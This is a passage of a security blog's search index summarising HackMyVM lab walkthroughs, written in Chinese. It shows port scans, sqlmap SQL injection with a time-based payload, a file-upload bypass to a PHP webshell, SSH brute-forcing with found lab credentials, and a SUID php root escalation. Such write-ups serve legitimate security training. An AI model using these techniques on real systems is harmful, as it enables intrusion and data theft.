txt,\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_3.png\" alt=\"HMM_vivifytech_image_3\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_3\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"根据收集的用户名-密码爆破-ssh\"\u003e根据收集的用户名, 密码爆破 ssh\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_4.png\" alt=\"HMM_vivifytech_image_4\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_4\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_5.png\" alt=\"HMM_vivifytech_image_5|400\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_5|400\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_6.png\" alt=\"HMM_vivifytech_image_6\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_6\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_7.png\" alt=\"HMM_vivifytech_image_7\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_7\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esarah:bohicon\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"user-txt-pwd\"\u003eUSER. txt PWD\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_8.png\" alt=\"HMM_vivifytech_image_8\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_8\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"收集泄露信息横向移动\"\u003e收集泄露信息,横向移动\u003c/h2\u003e\n\u003cp\u003ejresig secret\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_9.png\" alt=\"HMM_vivifytech_image_9\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_9\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_10.png\" alt=\"HMM_vivifytech_image_10\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_10\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esarah@VivifyTech:~/.gnupg/crls.d$ cat DIR.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ev:1:\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e在用户目录里面发现了 TASK. txt 文件\n下次应该直接全局找一下. txt 文件\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_11.png\" alt=\"HMM_vivifytech_image_11\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_11\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esarah@VivifyTech:~/.private$ cat Tasks.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e- Change the Design and architecture of the website\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e- Plan \u003cspan style=\"color:#66d9ef\"\u003efor\u003c/span\u003e an audit, it seems like our website is vulnerable\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e- Remind the team we need to schedule a party before going to holidays\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e- Give this cred to the new intern \u003cspan style=\"color:#66d9ef\"\u003efor\u003c/span\u003e some tasks assigned to him - gbodja:4Tch055ouy370N\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"利用-sudo-git-提权\"\u003e利用 sudo git 提权\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_12.png\" alt=\"HMM_vivifytech_image_12\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_12\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_13.png\" alt=\"HMM_vivifytech_image_13\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_13\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vivifytech_image_14.png\" alt=\"HMM_vivifytech_image_14\" /\u003e\u003cfigcaption\u003eHMM_vivifytech_image_14\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e","tags":["sec"],"title":"vivifytech"},{"date":"2024-02-11","permalink":"https://l1uyun.one/posts/hmv_zon/","summary":"\u003ch2 id=\"启动机器\"\u003e启动机器\u003c/h2\u003e\n\u003cp\u003e得指定网络接口\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo arp-scan -I eth5 -l\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zon_image_1.png\" alt=\"HMM_zon_image_1\" /\u003e\u003cfigcaption\u003eHMM_zon_image_1\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"端口扫描\"\u003e端口扫描\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo rustscan -a 192.168.10.13 -r 1-65535 -t \u003cspan style=\"color:#ae81ff\"\u003e8000\u003c/span\u003e --ulimit \u003cspan style=\"color:#ae81ff\"\u003e5000\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo nmap 192.168.10.13 -sT -Pn -p22,80 -sV -sC -O -oN portscan/norm\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo nmap 192.168.10.13 -sT -Pn -p22,80 --script\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003evuln -oN portscan/vuln\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zon_image_2.png\" alt=\"HMM_zon_image_2\" /\u003e\u003cfigcaption\u003eHMM_zon_image_2\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zon_image_3.png\" alt=\"HMM_zon_image_3\" /\u003e\u003cfigcaption\u003eHMM_zon_image_3\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"利用空格绕过文件上传过滤\"\u003e利用空格绕过文件上传过滤\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zon_image_4.png\" alt=\"HMM_zon_image_4\" /\u003e\u003cfigcaption\u003eHMM_zon_image_4\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e测试之后是检查文件名, 而不是文件头, 而且图片马不能正常解析\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zon_image_5.png\" alt=\"HMM_zon_image_5|750\" /\u003e\u003cfigcaption\u003eHMM_zon_image_5|750\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e非 jpeg 格式的无法上传\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zon_image_6.png\" alt=\"HMM_zon_image_6\" /\u003e\u003cfigcaption\u003eHMM_zon_image_6\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003ejpeg 格式能够正常上传\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zon_image_7.png\" alt=\"HMM_zon_image_7\" /\u003e\u003cfigcaption\u003eHMM_zon_image_7\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zon_image_8.png\" alt=\"HMM_zon_image_8\" /\u003e\u003cfigcaption\u003eHMM_zon_image_8\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n后面尝试了图片马, 但是没有正常解析, 无法执行命令\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e使用空格绕过\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#e6db74\"\u003e\u0026#34;webshell.jpeg .php\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zon_image_9.png\" alt=\"HMM_zon_image_9\" /\u003e\u003cfigcaption\u003eHMM_zon_image_9\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e一句话木马, 获得 webshell\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zon_image_10.png\" alt=\"HMM_zon_image_10\" /\u003e\u003cfigcaption\u003eHMM_zon_image_10\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\nfreddie\u003c/p\u003e","tags":["sec"],"title":"zon"},{"date":"2024-02-10","permalink":"https://l1uyun.one/posts/hmv_quick/","summary":"\u003ch2 id=\"host-discovery\"\u003ehost discovery\u003c/h2\u003e\n\u003cp\u003e主机发现, 重置了 wsl 的环境之后, 发现能够使用 arp-scan 了\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick_image_1.png\" alt=\"HMM_quick_image_1\" /\u003e\u003cfigcaption\u003eHMM_quick_image_1\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n前后对比\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick_image_2.png\" alt=\"HMM_quick_image_2\" /\u003e\u003cfigcaption\u003eHMM_quick_image_2\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e192.168.10.12\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"port-scan\"\u003eport scan\u003c/h2\u003e\n\u003cp\u003e只有一个 80 端口\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick_image_3.png\" alt=\"HMM_quick_image_3\" /\u003e\u003cfigcaption\u003eHMM_quick_image_3\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cp\u003e服务版本, 默认脚本, 操作系统扫描\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick_image_4.png\" alt=\"HMM_quick_image_4\" /\u003e\u003cfigcaption\u003eHMM_quick_image_4\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n漏洞扫描\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick_image_5.png\" alt=\"HMM_quick_image_5\" /\u003e\u003cfigcaption\u003eHMM_quick_image_5\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"利用远程包含获得-shell\"\u003e利用远程包含获得 shell\u003c/h2\u003e\n\u003cp\u003eRFI\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick_image_6.png\" alt=\"HMM_quick_image_6\" /\u003e\u003cfigcaption\u003eHMM_quick_image_6\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick_image_7.png\" alt=\"HMM_quick_image_7\" /\u003e\u003cfigcaption\u003eHMM_quick_image_7\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"user-txt-pwd\"\u003euser. txt PWD\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick_image_8.png\" alt=\"HMM_quick_image_8\" /\u003e\u003cfigcaption\u003eHMM_quick_image_8\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick_image_9.png\" alt=\"HMM_quick_image_9\" /\u003e\u003cfigcaption\u003eHMM_quick_image_9\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"use-suid-file-to-get-root\"\u003euse SUID file to get root\u003c/h2\u003e\n\u003cp\u003e\u003ccode\u003efind / -type f -perm -u=s 2\u0026gt;/dev/null\u003c/code\u003e\n发现一个suid的 php\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e./usr/bin/php7.0 -r \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;pcntl_exec(\u0026#39;/bin/sh\u0026#39;, [\u0026#39;-p\u0026#39;]);\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"root-txt-pwd\"\u003eroot. txt PWD\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_quick_image_10.png\" alt=\"HMM_quick_image_10\" /\u003e\u003cfigcaption\u003eHMM_quick_image_10\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e","tags":["sec"],"title":"quick"},{"date":"2024-02-10","permalink":"https://l1uyun.one/posts/hmv_tiny/","summary":"\u003ch2 id=\"主机发现\"\u003e主机发现\u003c/h2\u003e\n\u003cp\u003e使用 nmap 进行主机发现[[THM_Nmap Live Host Discovery(活动主机发现)]]\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo nmap 192.168.10.1/24 -PA -sn -oN portscan/discovery.nmap\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vinylizer_image_1.png\" alt=\"HMM_vinylizer_image_1\" /\u003e\u003cfigcaption\u003eHMM_vinylizer_image_1\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e192.168.10.10\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003ch2 id=\"端口扫描\"\u003e端口扫描\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vinylizer_image_2.png\" alt=\"HMM_vinylizer_image_2\" /\u003e\u003cfigcaption\u003eHMM_vinylizer_image_2\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vinylizer_image_3.png\" alt=\"HMM_vinylizer_image_3\" /\u003e\u003cfigcaption\u003eHMM_vinylizer_image_3\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"web-侦查\"\u003eweb 侦查\u003c/h2\u003e\n\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vinylizer_image_4.png\" alt=\"HMM_vinylizer_image_4\" /\u003e\u003cfigcaption\u003eHMM_vinylizer_image_4\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003ch2 id=\"利用登录页面的-sql-注入\"\u003e利用登录页面的 sql 注入\u003c/h2\u003e\n\u003cp\u003esqlmap\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo sqlmap http://192.168.10.10/login.php --data \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;username=admin\u0026amp;password=admin\u0026amp;login=\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vinylizer_image_5.png\" alt=\"HMM_vinylizer_image_5\" /\u003e\u003cfigcaption\u003eHMM_vinylizer_image_5\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e---\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eParameter: username \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003ePOST\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e    Type: time-based blind\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e    Title: MySQL \u0026gt;\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e 5.0.12 AND time-based blind \u003cspan style=\"color:#f92672\"\u003e(\u003c/span\u003equery SLEEP\u003cspan style=\"color:#f92672\"\u003e)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e    Payload: username\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eadmin\u003cspan style=\"color:#e6db74\"\u003e\u0026#39; AND (SELECT 7762 FROM (SELECT(SLEEP(5)))rBJA) AND \u0026#39;\u003c/span\u003emJfQ\u003cspan style=\"color:#e6db74\"\u003e\u0026#39;=\u0026#39;\u003c/span\u003emJfQ\u0026amp;password\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eadmin\u0026amp;login\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e---\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e查看所有数据库\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e sudo sqlmap http://192.168.10.10/login.php --data \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;username=admin\u0026amp;password=admin\u0026amp;login=\u0026#34;\u003c/span\u003e --dbs\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vinylizer_image_6.png\" alt=\"HMM_vinylizer_image_6\" /\u003e\u003cfigcaption\u003eHMM_vinylizer_image_6\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n查看数据库的表信息\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e sudo sqlmap http://192.168.10.10/login.php --data \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;username=admin\u0026amp;password=admin\u0026amp;login=\u0026#34;\u003c/span\u003e --tables -D vinyl_marketplace\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vinylizer_image_7.png\" alt=\"HMM_vinylizer_image_7\" /\u003e\u003cfigcaption\u003eHMM_vinylizer_image_7\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n查看某一个表的列信息\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo sqlmap http://192.168.10.10/login.php --data \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;username=admin\u0026amp;password=admin\u0026amp;login=\u0026#34;\u003c/span\u003e --columns -D vinyl_marketplace -T users\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003e\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_vinylizer_image_8.png\" alt=\"HMM_vinylizer_image_8\" /\u003e\u003cfigcaption\u003eHMM_vinylizer_image_8\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n查看对应列的信息\u003c/p\u003e","tags":["sec"],"title":"vinylizer"},{"date":"2024-02-09","permalink":"https://l1uyun.one/posts/hmv_zeug/","summary":"\u003cp\u003enetdiscover\u003c/p\u003e\n\u003ch2 id=\"主机发现\"\u003e主机发现\u003c/h2\u003e\n\u003cp\u003e启动前\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zeug_image_1.png\" alt=\"HMM_zeug_image_1|550\" /\u003e\u003cfigcaption\u003eHMM_zeug_image_1|550\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n启动后, 以后就先导入 VirtualBox 然后导出, 再导入 VMware 算了\n\n\u003cfigure class=\"md-figure\"\u003e\n  \u003cimg loading=\"lazy\" decoding=\"async\" src=\"https://img.l1uyun.one/HMM_zeug_image_2.png\" alt=\"HMM_zeug_image_2\" /\u003e\u003cfigcaption\u003eHMM_zeug_image_2\u003c/figcaption\u003e\u003c/figure\u003e\n\n\n\n靶机 ip 192.168.10.4\u003c/p\u003e\n\u003ch2 